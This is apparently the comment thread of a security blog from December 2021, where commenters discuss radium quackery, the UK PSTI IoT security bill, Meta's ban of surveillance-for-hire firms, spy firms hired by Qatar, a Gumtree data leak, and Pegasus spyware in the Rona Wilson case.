Both have the words “radio” in their name and are electromagnetic radiation.

They are not the first with radiation as a health benefit…

Look up the history of radium and it’s alleged curitive powers a little over a century ago.

In fact just naming something with Radium was the equivalent of giving it magic restorative powers, even if it did not have radium in it…

It was the new snake oil of it’s time and much was made of it, in fact a towns fortunes could hang on a supply of noxious output from aquifers.

Have a look at,

https://exploreclaremorehistory.wordpress.com/2021/12/16/go-with-the-flow-to-the-bungalow/

It makes fascinating reading especially the bit with a man trying to out run a barrel that chased him during bad weather.

So that was the power of magic “wo-wo”… Still alive today with stern admonishment for those that dare question by use of science…

After all you don’t need science when you have the evidence of your second hand experience, so of course there can be no question,

The Earth is flat and 5G makes you glow in the dark and gives even women male patern baldness at an early age…

There can be no doubt :-S

Ted December 16, 2021 4:40 PM

The UK’s PSTI bill is currently in Parliament’s House of Commons for review.

As you all remember, this is the bill that would introduce new security regulations for IoT devices.

The bill appears to be at the 2nd reading stage. According to the parliament’s website, a date for the 2nd reading has not yet been announced.

https://bills.parliament.uk/bills/3069

Do you all remember Statler and Waldorf? These were the cantankerous pair of Muppets who had a penchant for heckling from a theatre balcony.

Well, this bill seems to be getting a little of the same treatment. Because, of course, good security is hard. And expensive.

Here were some of the questions raised:

Who would be responsible for managing a device’s unique password? And would technicians need backdoor access for repairs if a user forgets their password?

Someone said: ‘there’s nothing in the bill that requires bugs to be fixed before they are disclosed.’

But at first glance, I don’t really understand how this relates to the requirement for products to have a vulnerability disclosure policy?

There was also a concern that manufacturers would discount prices at a products end-of-life (when it is no longer receiving security updates) and drive consumers to buy less secure devices.

There is also the question of how UK markets will deal with products from China, who may not comply with UK regulations.

Still others believe the UK government isn’t acting fast enough.

But at least people are really thinking about this. We don’t want to keep sitting on square one just because manufacturers don’t suffer the same losses as the rest of us.

https://techcrunch.com/2021/12/04/uk-internet-of-things-cybersecurity-bill/

SpaceLifeForm December 16, 2021 5:38 PM

@ Clive

Assumed?

It is assumed that fraudulent passports have been issued in exchange for cash…

Oh, my bad. I thought you were referring to actual passports.

ResearcherZero December 16, 2021 10:44 PM

@Ted

Maybe, vulnerabilities like Log4j will prompt them to consider the bill wisely, but then trying to explain technical problems to politicians is an issue in itself.
Financial cost is something they can understand, and perhaps if they understood technical problems meant that “all your secrets and correspondence will spill out”, maybe they would understand that.

Spyware firms spying on politicians on behalf of governments.

Meta was able to determine in some cases that the spyware firms were working on behalf of governments, law firms and individuals, the companies were “indiscriminate” about whom they targeted. “We are seeing politicians. We’re seeing human rights activists. We’re seeing lawyers, doctors, clergy, in some cases ordinary citizens. Anyone who might be party to a lawsuit,”

“Almost anyone can hire one of these firms,” he said. “These firms both democratize these threats and they give an added layer of deception to the worst actors.”

Black Cube created fake accounts posing as graduate students, human rights workers and film and TV producers and tried to set up phone calls and get email addresses for a wide range of targets,

Bluehawk CI tried to trick government opponents in the United Arab Emirates by pretending to be reporters for Fox News and Italy’s La Stampa,

Meta also took down accounts connected to “an unidentified entity in China” that, Meta says, made tools used by Chinese law enforcement to spy on minority groups in Xinjiang, Myanmar and Hong Kong.

https://www.npr.org/2021/12/16/1064628654/facebook-bans-surveillance-firms-that-spied-on-50000-people

hxxps://about.fb.com/wp-content/uploads/2021/12/Threat-Report-on-the-Surveillance-for-Hire-Industry.pdf

Craft PNG files that appear completely different in Apple software
hxxps://www.da.vidbuchanan.co.uk/widgets/pngdiff/

ResearcherZero December 17, 2021 12:15 AM

Private spy firms helped Qatar beat other bids for World Cup

Global Risk Advisors bills itself as “an international strategic consultancy specializing in cybersecurity, military and law enforcement training, and intelligence-based advisory services”

Chalker also promised the Qataris the use of I.T. and “technical collection specialists” as well as top field operatives with backgrounds in “highly sensitive U.S. intelligence and military operations” who could “spot, assess, develop, recruit, and handle assets with access to persons and topics of interests” on Qatar’s behalf, company materials show.

He also emphasized aggression and discretion, saying his plans included “patsies,” and “lightning rods,” psychological operations, and “persistent and aggressive distractions and disruptions” aimed at Qatar’s enemies all while giving the country “full deniability,” company records show.

AP reviewed a variety of projects Global Risk Advisors proposed between 2014 and 2017 show proposals not just directly related to the World Cup.

They included “Pickaxe ,” which promised to capture “personal information and biometrics” of migrants working in Qatar. “Falconeye” was described as a plan to use drones to provide surveillance of ports and borders operations, as well as “controlling migrant worker populations centers.”

Another project, “Viper” promised on-site or remote “mobile device exploitation,” which Global Risk Advisors said would deliver “critical intelligence” and enhance national security.

Chalker authored a proposal for “Project Deviant.” It called for Global Risk Advisors to provide a robust spying and hacking training program for employees at Qatar’s Ministry of Interior “based on the elite training undertaken by (Global Risk Advisors) officers from the U.S. military and intelligence agencies. ” Deviant included a 47-week “field operations tradecraft course” that would include training on surveillance, disguises, interrogation techniques, asset recruitment, hand-to-hand combat, and other areas, a GRA proposal shows.

The 26-week “technical operations tradecraft course” promised to teach Qataris with just even just a basic IT background to become world-class hackers with the “necessary knowledge, skills and techniques to use highly restricted, cutting-edge tools to penetrate target systems and devices, collect and analyze bulk signals data, and to track and locate targets to ultra-precise locations,” records show.

https://apnews.com/article/soccer-sports-business-migration-middle-east-d9716b62fc69ab88beb3553d402da7d1

ResearcherZero December 17, 2021 12:18 AM

“The site was super leaky. Every advert on the site included the seller’s postcode or GPS coordinates – even if the seller requested the map of their location to be hidden. It leaked the sellers email address, and their full name was available via a simple IDOR vulnerability.”

In October the governor of Missouri threatened to prosecute a local journalist who found some Social Security Numbers in the HTML source of the Department of Elementary and Secondary Education’s web site. This type of response isn’t uncommon when trying to disclose information to a vendor. It’s not often they are grateful, and usually they want to keep it quiet, don’t respond, or they don’t understand and want to sue you.

Inspired by Governor Parson, I developed a multi-stage process to view sensitive information belonging to other Gumtree users:

1 View an advert on gumtree.com
2 Press F12
3 Read
4 The
5 Sellers
6 Email
7 Address
8 In
9 The
10 HTML

https://www.pentestpartners.com/security-blog/gumtree-leaking-your-data-and-not-really-listening/

Winter December 17, 2021 12:28 AM

@Clive
“Look up the history of radium and it’s alleged curitive powers a little over a century ago.”

Indeed, drinking radium water was all the rage back then.

One thing that prevented people from seeing the dangers is that some people have a high tolerance to radium. They would advocate the safety and health of radium on their own body, all the while really believing their own words. Other people would fall for it and die a gruesome death.

Read this absolute horror story:
ht-tps://medium.com/lessons-from-history/the-blessings-of-radium-water-made-his-head-disintegrate-3ac052cb8620

Alternative healing is poison. Sometimes literally so.

Ted December 17, 2021 12:49 AM

@ResearcherZero

Re: Meta (formerly Facebook) and “surveillance-for-hire” companies

Wow. So interesting. It’s curious that Meta identified and focused on providers in certain countries:

These providers are based in China, Israel, India, and North Macedonia.

To add to your post, here are the 7 companies being banned: Cobwebs, Cognyte, Black Cube, Bluehawk CI, BellTroX, Cytrox, and an unknown entity in China.

In their Threat Report, Meta holds this as one of their principles:

Governance & ethics: We welcome domestic and international efforts to raise accountability through legislation, export controls and regulatory actions. We also encourage broader civil society and regulator-led conversations about the ethics of using these technologies by law enforcement and private companies, as well as creating effective victim protection regimes.

I hope Meta plans to issue accountability reports for these statements, good as they are.

https://about.fb.com/news/2021/12/taking-action-against-surveillance-for-hire/

Ted December 17, 2021 1:15 AM

@SpaceLifeForm, ResearcherZero

Re: Predator

#CitizenLab #EgyptiansInExile #Cytrox #iPhoneSpyware

You don’t have to, but you might enjoy listening to Chapter 2 of Nicole Perlroth’s book ‘The Fucking Salmon.’

The book is ‘This Is How They Tell Me the World Ends.’

So good.

ResearcherZero December 17, 2021 2:25 AM

@Ted

This is certainly a crazy story.

32 documents allegedly planted on activists laptop.

“A smartphone belonging to jailed Indian activist Rona Wilson was infiltrated using NSO Group’s Pegasus spyware before his arrest, according to a new forensic analysis by Amnesty International’s Security Lab that reignites questions about the use of malware attacks against dissidents and government critics in India.”

The phone backups were provided to Amnesty at the request of Wilson’s defense team by Arsenal Consulting, a U.S. digital forensics firm that examined an electronic copy of Wilson’s laptop provided by his lawyers.

Amnesty’s analysis of two electronic copies of Wilson’s phone backups revealed that his phone was first compromised using Pegasus spyware in July 2017. The traces of infection appear again in early 2018, according to Amnesty.

Wilson received at least 15 SMS messages with malicious links in a span of six months, the last of which was delivered four months before his arrest in June 2018, according to Maynier. Some were disguised as links to sign petitions on human rights causes, and others were advertisements.

Wilson’s laptop had been subject to a sophisticated malware attack in 2016, nearly two years before his arrest, in which an unknown hacker planted evidence, including a letter purportedly written by Wilson to a Maoist leader where he urged the group to assassinate Modi. A subsequent forensic analysis by Arsenal revealed that at least 30 incriminating documents recovered from Wilson’s device by the police had been planted.

The charging documents claim that Wilson and more than a dozen other activists were associated with a banned guerrilla group of Maoists in central India that aims to overthrow the government. The activists deny the charges.

The activists have been charged under a stringent anti-terrorism law that critics say Modi’s government has used increasingly against dissidents.

hxxps://www.washingtonpost.com/world/2021/12/17/india-pegasus-bhima-koregaon/

“Key evidence against a group of Indian activists accused of plotting to overthrow the government was planted on a laptop seized by police, a new forensics report concludes, deepening doubts about a case viewed as a test of the rule of law under Prime Minister Narendra Modi.”

hxxps://www.washingtonpost.com/context/new-forensics-report-concludes-evidence-was-planted-in-case-against-indian-activists/1fb9874f-0f32-44fc-b9e9-0e59b69e9200/

“A previous analysis by Arsenal, which The Washington Post reported in February, found that 10 letters had been deposited on the laptop, including one that discussed an alleged plot to assassinate Modi. The latest report by Arsenal finds that 22 additional documents were also delivered to the computer by the same attacker.”

The documents — now totaling 32 — have been cited by law enforcement as evidence against a group of activists accused of working with a banned Maoist militant group that has waged a decades-old insurgency against the Indian state.

hxxps://www.washingtonpost.com/world/2021/04/20/india-bhima-koregaon-activists-report/

Clive Robinson December 17, 2021 6:05 AM

@ ResearcherZero, ALL,

Private spy firms helped Qatar beat other bids for World Cup

Sort of private… But with US Government blessing at a very high level in the hierarchy…

We know that there were a number of US personnel involved that had had NSA gigs through other “private companies” shortly before Ed Snowden revelations showed what immoral and illegal thibgs the US Government was upto with regards spying on US citizens.

Feeling that “their brand was burned” and they were effectively jobless they were “encoraged” to go and do “anti-terror” work in the Middle East.

Which is what,

“Chalker also promised the Qataris the use of I.T. and “technical collection specialists” as well as top field operatives with backgrounds in “highly sensitive U.S. intelligence and military operations” who could “spot, assess, develop, recruit, and handle assets with access to persons and topics of interests” on Qatar’s behalf, company materials show.”

Is all about.

Only some quickly found out the definition some used for “terrorist” was not the one they expected…

Which is also what,

“They included “Pickaxe ,” which promised to capture “personal information and biometrics” of migrants working in Qatar.”

Is in part about, the Qatari Government viewed “migrants” not as “workers” but subhuman to slaves, an evil that poluted their land and for some their ideology. But nether the less a necessary one, run at arms length by the equivalent of “Gang Masters”. Those “gang masters” attitudes to the “workers” made the Qatari Government views look almost saintly in comparison… The “spying on the workers” was to weed out what were seen as “trouble makers” and deal with them, by them having accidents etc because they were “careless”…

All of this was quite a shock for some of the Ex NSA people who came back and tried to blow the whistle mostly unsuccessfuly. The reason can be found by “following the money back” in these so called “Private Companies”. You might be shocked at finding out who have fingers in those fat pies, and obviously they did not want it becoming well known. So people in effect got burned.

The moral is if you are in these dirty “spy on your fellow citizen” games for your Government, and you or what you are doing gets “outed” in some way, you are in effect left vulnerable.

Sadly some see that as opportunity. They come along and that is when that “tide you over till it blows over” job they tell you about “out of country” very likely will be the end of you one way or another.

Remember they are doing themselves a favour at your expense, because it is at best questionable work used as a cover for not just illegal but technically treasonous work.

Getting a Government Spy job shot out from underneath you does not blow over ever… You don’t come back, it just gets increasingly unethical and immoral, and either you jump right in and try to become a “King Rat” or your soul gets eaten piece by piece. Remember there is no “moral high ground” no “for the greater good” or other clap trap you get spun so that others further up the hierarchy can enjoy “Might is Right” and banking the profits. It’s all unethical and immoral, they don’t care “power is power” but if you do then you might find your personal Hell’s Gates are opened wide for you long before you die.

JonKnowsNothing December 17, 2021 10:23 AM

@All

On the good news front: Some bumper crops are being harvested in different countries.

On the bad news front: Some harvests are very poor: climate impacts (too hot, too cold, too wet, too dry) and pests (mice particularly but elephants can be a nuisance too) and wars (burning, destruction, theft).

There are the self-infected shortages, NZ had a problem with a dark sugar plant and their holiday supply of the preferred baking sugar was crimped.

The supply chain news during the holidays is focused more on material goods and products but the impacts of supply chain problems on foods hasn’t changed a lot.

There are shortages of different foods in different regions and there’s a fair amount of look-aways because there’s certainly a feeling of no-ho-ho that goes with the reporting of hunger when you are planning a big holiday dinner bash.

One UK holiday meal got some unwanted attraction because of Social Media. If the images had not been shared, the paucity of what passed as a Special Menu would have been lost under the look-aways.

While the meal was given out in the UK with what must be holiday intended feast treats, the image appeared to be (in American English):

  • 2 dry English Muffins
  • 1 slice of dry turkey breast
  • 1 unidentifiable something called “pig in a blanket” (no relationship to the American breakfast item called “pig in a blanket”)
  • 1 single serving mince pie in a tiny muffin tin

It’s hard to know if the dinner was a function of budget or lack of supply.

The school board pushed back on criticisms, claiming the meal was “really enjoyed [by the students] and this was evidenced by the empty plates and happy faces” and refused to refund the cost of the lunch.

Until the images started making the rounds on Social Media.

Then school claimed the poor food options were “due to unforeseen supply chain issues and Covid-related staffing shortages.”

Perhaps if they had framed it as a Social Awareness Experience of hunger and lack of food security, they might have gotten a pass.

In California we are up to 161,000 homeless-houseless living in tents under freeways, encampments and semi-tolerated in empty lots. Another larger group in RV-homes are parked along the side streets and Walmart parking lots around Silicon Valley were their occupants work because there are no affordable living spaces within hours of their job location. The demands for food support from all non-governmental organizations have increased 30-60%.

These conditions get a few more looks during feasting-days but the problem is still there the next day and the next day.

At least social media will be there to document it.

===

ht tps://ww w.the guard ian.com/education/2021/dec/15/school-apologises-after-grim-christmas-lunch-goes-viral-on-social-media

ResearcherZero December 17, 2021 10:52 PM

Can someone cycle CensorBot’s power again? It won’t allow any posts about “Terrorists” or any would be “terrorists” posing as academics, journalists or activists.

SpaceLifeForm December 18, 2021 12:25 AM

@ Ted, ResearcherZero, mmasnick

I hope Meta plans to issue accountability reports for these statements, good as they are.

Not happening. But they are running TV commercials with actors that say that moderation is hard. Under the Facebook label.

Zuck knows he is in trouble because of Cambridge Analytica.

Clive Robinson December 18, 2021 8:06 AM

@ SpaceLifeForm,

Zuck knows he is in trouble because of Cambridge Analytica.

He should not have so eagerly lept in bed with a “bunny boiler”…

So now not only has he been “used” he’s starting to understand “abused”

But will it get through his narcissism, sadism and above all psychopathic behaviours?

Probably not, he will,

1, Blaim others
2, Do it again
3, Keep doing what he is doing

Untill he is forced to do otherwise, because he has no morals or ethics and sees himself as some deity…

ResearcherZero December 18, 2021 10:03 PM

@SpaceLifeForm

Moderation is hard. Just imagine people keep posting a story from the Washington Post about a guy who had 32 documents appear on his laptop.
You keep hitting it with hammers, then another story pops up that his phone was also hacked as well, by a well know spyware company.

They guy is jail, he might not be guilty, he could be guilty, the documents appearing on his laptop might have an innocent explanation. NIA says there was no malware, an analysis by another security company says there is.

It’s like whack a mole.

ResearcherZero December 18, 2021 10:13 PM

The War in the Shadows (real article name [REDACTED])

A smartphone belonging to jailed Indian activist Rona Wilson was infiltrated using NSO Group’s Pegasus spyware before his arrest, according to a new forensic analysis by Amnesty International’s Security Lab that reignites questions about the use of malware attacks against dissidents and government critics in India.

The phone backups were provided to Amnesty at the request of Wilson’s defense team by Arsenal Consulting, a U.S. digital forensics firm that examined an electronic copy of Wilson’s laptop provided by his lawyers.

Amnesty’s analysis of two electronic copies of Wilson’s phone backups revealed that his phone was first compromised using Pegasus spyware in July 2017. The traces of infection appear again in early 2018, according to Amnesty.

Wilson received at least 15 SMS messages with malicious links in a span of six months, the last of which was delivered four months before his arrest in June 2018, according to Maynier. Some were disguised as links to sign petitions on human rights causes, and others were advertisements.

Wilson’s laptop had been subject to a sophisticated malware attack in 2016, nearly two years before his arrest, in which an unknown hacker planted evidence, including a letter purportedly written by Wilson to a Maoist leader where he urged the group to assassinate Modi. A subsequent forensic analysis by Arsenal revealed that at least 30 incriminating documents recovered from Wilson’s device by the police had been planted.

The charging documents claim that Wilson and more than a dozen other activists were associated with a banned guerrilla group of Maoists in central India that aims to overthrow the government. The activists deny the charges.

The activists have been charged under a stringent anti-terrorism law that critics say Modi’s government has used increasingly against dissidents.

hxxps: [REDACTED]

Digital forensics firm Arsenal Consulting said Wilson’s Apple phone was not just selected for surveillance by a client of Israel’s NSO Group but was also successfully compromised on many occasions.

hxxps: [REDACTED]

Key evidence against a group of Indian activists accused of plotting to overthrow the government was planted on a laptop seized by police, a new forensics report concludes, deepening doubts about a case viewed as a test of the rule of law under Prime Minister Narendra Modi.

hxxps: [REDACTED]

A previous analysis by Arsenal, which The Washington Post reported in February, found that 10 letters had been deposited on the laptop, including one that discussed an alleged plot to assassinate Modi. The latest report by Arsenal finds that 22 additional documents were also delivered to the computer by the same attacker.

The documents — now totaling 32 — have been cited by law enforcement as evidence against a group of activists accused of working with a banned Maoist militant group that has waged a decades-old insurgency against the Indian state.

hxxps: [REDACTED]

Wilson is one of 16 people arrested since June 2018 for their part in an alleged Maoist conspiracy to foment an uprising against Modi’s government. The origin of this so-called conspiracy was traced to a festival called the Elgaar Parishad (meaning “loud assembly”) held in Pune on 31 December 2017

Wilson had been nowhere near the Elgaar Parishad event. In fact, he was not even in Maharashtra at the time. According to his legal team, he was in Delhi. After the raid on his flat, the police, however, claimed that an analysis of Wilson’s computer and thumb drive had revealed several incriminating documents, including a letter in which Wilson had written about “targeting” Modi’s “road-shows” in “another Rajiv Gandhi type incident” – a reference to the assassination of India’s former prime minister by a Tamil Tiger suicide bomber in 1991.

hxxps: [REDACTED]

India’s federal anti-terror body, the National Investigation Agency (NIA), has dismissed Arsenal’s findings, saying the company has “no locus standi to give opinion”, and noting that the Indian government’s own forensics lab discovered no malware on Wilson’s devices.

hxxps: [REDACTED]

ResearcherZero December 18, 2021 11:30 PM

@SpaceLifeForm

More importantly, ‘patience is a virtue’, in this self-serving, instant gratification prison of our own design (or the design of the financiers of Zuckerberg, and all who since agreed to the EULA).

If you have ever worked with, or inspected the “chain of evidence”, in many jurisdictions it is more of a “chicken wire fence”, with a bunch of holes in it, that is poorly supervised. Repercussions for reporting the state of the “chain of evidence” can be severe. Repercussions for ‘reporting’ can be severe, and reporting is considered mandatory.

“the author who self-censors — a figure who in contemporary Internet terms might be called the “creator,” or “maker.” This figure is me — and this figure is you. It’s someone who takes the burden of censorship unto themselves, without any official censor or cover-censor commanding them.

…this figure threatens to become the ultimate vessel or incarnation of the State, a person who has internalized its oppressions and works them on themselves.”
https://edwardsnowden.substack.com/p/on-censorship-pt-1

Don’t ever become a victim of circumstance. Possibly maintain an ethereal vapor like form at all times, while never obtaining molecular stability? Any real presence in reality could end in certain doom, no matter how many high court judges you may personally know.

Leave a comment

Login

Allowed HTML <a href="URL"> • <em> <cite> <i> • <strong> <b> • <sub> <sup> • <ul> <ol> <li> • <blockquote> <pre> Markdown Extra syntax via https://michelf.ca/projects/php-markdown/extra/

Sidebar photo of Bruce Schneier by Joe MacInnis.